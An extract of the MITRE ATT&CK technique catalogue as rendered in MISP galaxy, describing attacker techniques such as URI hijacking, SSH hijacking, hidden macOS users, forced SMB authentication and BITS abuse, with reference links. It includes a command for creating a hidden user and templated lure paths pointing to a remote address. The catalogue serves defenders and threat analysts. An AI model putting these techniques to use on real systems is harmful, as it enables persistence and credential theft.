https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/
https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/

URI Hijacking - T1416

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416"

Table 3907. Table References
Links
https://attack.mitre.org/techniques/T1416
https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/
https://tools.ietf.org/html/rfc7636

Input Capture - T1417

Adversaries may capture user input to obtain credentials or other information from the user through various methods.

Malware may masquerade as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.

On Android, malware may abuse accessibility features to record keystrokes by registering an AccessibilityService class, overriding the onAccessibilityEvent method, and listening for the AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED event type. The event object passed into the function will contain the data that the user typed.

Additional methods of keylogging may be possible if root access is available.

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1417"

Table 3908. Table References
Links
https://attack.mitre.org/techniques/T1417
https://zeltser.com/third-party-keyboards-security/

Hidden Users - T1147

Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147"

View relationships graph

Hidden Users - T1147 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 3909. Table References
Links
https://attack.mitre.org/techniques/T1147
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

Application Discovery - T1418

Adversaries may seek to identify all applications installed on the device. One use case for doing so is to identify the presence of endpoint security applications that may increase the adversary’s risk of detection. Another use case is to identify the presence of applications that the adversary may wish to target.

On Android, applications can use methods in the PackageManager class (Citation: Android-PackageManager) to enumerate other apps installed on device, or an entity with shell access can use the pm command line tool.

On iOS, apps can use private API calls to obtain a list of other apps installed on the device. (Citation: Kurtz-MaliciousiOSApps) However, use of private API calls will likely prevent the application from being distributed through Apple’s App Store.

The tag is: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"

Table 3910. Table References
Links
https://attack.mitre.org/techniques/T1418
https://developer.android.com/reference/android/content/pm/PackageManager.html
https://andreas-kurtz.de/2014/09/malicious-ios-apps/

SSH Hijacking - T1184

Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)

[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184"

View relationships graph

SSH Hijacking - T1184 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"

Table 3911. Table References
Links
https://attack.mitre.org/techniques/T1184
https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219
https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf
https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking
https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Web Service - T1481

Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.

These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1481"

Table 3912. Table References
Links
https://attack.mitre.org/techniques/T1481

LC_MAIN Hijacking - T1149

This technique has been deprecated and should no longer be used.

As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.

The tag is: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149"

Table 3913. Table References
Links
https://attack.mitre.org/techniques/T1149
https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Disk Wipe - T1561

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Wipe - T1561"

Table 3914. Table References
Links
https://attack.mitre.org/techniques/T1561
https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
https://docs.microsoft.com/sysinternals/downloads/sysmon

Input Injection - T1516

A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android’s accessibility APIs.

[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:

Mimicking user clicks on the screen, for example to steal money from a user’s PayPal account.(Citation: android-trojan-steals-paypal-2fa)
Injecting global actions, such as GLOBAL_ACTION_BACK (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)
Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)

The tag is: misp-galaxy:mitre-attack-pattern="Input Injection - T1516"

Table 3915. Table References
Links
https://attack.mitre.org/techniques/T1516
https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html
https://help.bitwarden.com/article/auto-fill-android/

Startup Items - T1165

Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1165"

View relationships graph

Startup Items - T1165 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"

Table 3916. Table References
Links
https://attack.mitre.org/techniques/T1165
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Access Notifications - T1517

A malicious application can read notifications sent by the operating system or other applications, which may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. A malicious application can also dismiss notifications to prevent the user from noticing that the notifications arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517"

Table 3917. Table References
Links
https://attack.mitre.org/techniques/T1517
https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/

Dylib Hijacking - T1157

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.

A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)

If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157"

View relationships graph

Dylib Hijacking - T1157 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004" with estimative-language:likelihood-probability="almost-certain"

Table 3918. Table References
Links
https://attack.mitre.org/techniques/T1157
https://capec.mitre.org/data/definitions/471.html
https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Software Discovery - T1518

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518"

Table 3919. Table References
Links
https://attack.mitre.org/techniques/T1518
https://capec.mitre.org/data/definitions/580.html

Launch Agent - T1159

Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).

Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159"

View relationships graph

Launch Agent - T1159 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 3920. Table References
Links
https://attack.mitre.org/techniques/T1159
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

Call Control - T1616

Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.

Several permissions may be used to programmatically control phone calls, including:

ANSWER_PHONE_CALLS - Allows the application to answer incoming phone calls(Citation: Android Permissions)
CALL_PHONE - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)
PROCESS_OUTGOING_CALLS - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)
MANAGE_OWN_CALLS - Allows a calling application which manages its own calls through the self-managed ConnectionService APIs(Citation: Android Permissions)
BIND_TELECOM_CONNECTION_SERVICE - Required permission when using a ConnectionService(Citation: Android Permissions)
WRITE_CALL_LOG - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)

When granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using Intent.ACTION_DIAL, which requires no specific permissions. This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.

The tag is: misp-galaxy:mitre-attack-pattern="Call Control - T1616"

Table 3921. Table References
Links
https://attack.mitre.org/techniques/T1616
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html
https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html
https://developer.android.com/reference/android/Manifest.permission

Browser Extensions - T1176

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser’s app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension’s update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles, however <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)

Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"

Table 3922. Table References
Links
https://attack.mitre.org/techniques/T1176
https://en.wikipedia.org/wiki/Browser_extension
https://developer.chrome.com/extensions
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
https://www.xorrior.com/No-Place-Like-Chrome/
https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/
https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/
https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)
https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/
https://kjaer.io/extension-malware/

Securityd Memory - T1167

If an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1167"

View relationships graph

Securityd Memory - T1167 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002" with estimative-language:likelihood-probability="almost-certain"

Table 3923. Table References
Links
https://attack.mitre.org/techniques/T1167
http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Process Doppelgänging - T1186

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
Load – Create a shared section of memory and load the malicious executable.
Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
Animate – Create a process from the tainted section of memory and initiate execution.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186"

View relationships graph

Process Doppelgänging - T1186 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013" with estimative-language:likelihood-probability="almost-certain"

Table 3924. Table References
Links
https://attack.mitre.org/techniques/T1186
https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx
https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx
https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx
https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/
https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

User Evasion - T1618

Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.

While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

The tag is: misp-galaxy:mitre-attack-pattern="User Evasion - T1618"

Table 3925. Table References
Links
https://attack.mitre.org/techniques/T1618

LSASS Driver - T1177

The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177"

View relationships graph

LSASS Driver - T1177 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 3926. Table References
Links
https://attack.mitre.org/techniques/T1177
https://technet.microsoft.com/library/cc961760.aspx
https://technet.microsoft.com/library/dn408187.aspx
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

Forced Authentication - T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187"

Table 3927. Table References
Links
https://attack.mitre.org/techniques/T1187
https://en.wikipedia.org/wiki/Server_Message_Block
https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/
https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx
https://github.com/hob0/hashjacking
https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf
https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
https://www.us-cert.gov/ncas/alerts/TA17-293A

BITS Jobs - T1197

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)

The tag is: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"

Table 3928. Table References
Links
https://attack.mitre.org/techniques/T1197
https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx
https://msdn.microsoft.com/library/aa362813.aspx
https://www.secureworks.com/blog/malware-lingers-with-bits
https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/
https://www.symantec.com/connect/blogs/malware-update-windows-update
https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/
https://technet.microsoft.com/library/dd939934.aspx
https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

Trusted Relationship - T1199

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"

Table 3929. Table References
Links
https://attack.mitre.org/techniques/T1199
https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers

Misattributable credentials - T1322

The use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)

The tag is: misp-galaxy:mitre-attack-pattern="Misattributable credentials - T1322"

Table 3930. Table References
Links
https://attack.mitre.org/techniques/T1322

Data Encrypted - T1532

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532"

Table 3931. Table References
Links
https://attack.mitre.org/techniques/T1532

DNS poisoning - T1382

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

DNS (cache) poisoning is the corruption of an Internet server’s domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)

The tag is: misp-galaxy:mitre-attack-pattern="DNS poisoning - T1382"

Table 3932. Table References
Links
https://attack.mitre.org/techniques/T1382

Process Discovery - T1424

On Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7, applications can obtain this information by executing the <code>ps</code> command, or by examining the <code>/proc</code> directory. Starting in Android version 7, use of the Linux kernel’s <code>hidepid</code> feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424"

Table 3933. Table References
Links
https://attack.mitre.org/techniques/T1424
https://code.google.com/p/android/issues/detail?id=205565

Capture Audio - T1429

Adversaries may capture audio to collect information on a user of a mobile device using standard operating system APIs. Adversaries may target audio information such as user conversations, surroundings, phone calls, or other sensitive information.

Android and iOS, by default, requires that an application request access to microphone devices from the user. In Android, applications must hold the <code>android.permission.RECORD_AUDIO</code> permission to access the microphone and the <code>android.permission.CAPTURE_AUDIO_OUTPUT</code> permission to access audio output such as speakers. Android does not allow third-party applications to hold <code>android.permission.CAPTURE_AUDIO_OUTPUT</code>, so audio output can only be obtained by privileged applications (distributed by Google or the device vendor) or after a successful privilege escalation attack. In iOS, applications must include the NSMicrophoneUsageDescription key in their Info.plist file.

The tag is: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429"

Table 3934. Table References
Links
https://attack.mitre.org/techniques/T1429
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Unsecured Credentials - T1552

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552"

Table 3935. Table References
Links
https://attack.mitre.org/techniques/T1552

Impair Defenses - T1562

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562"

Table 3936. Table References
Links
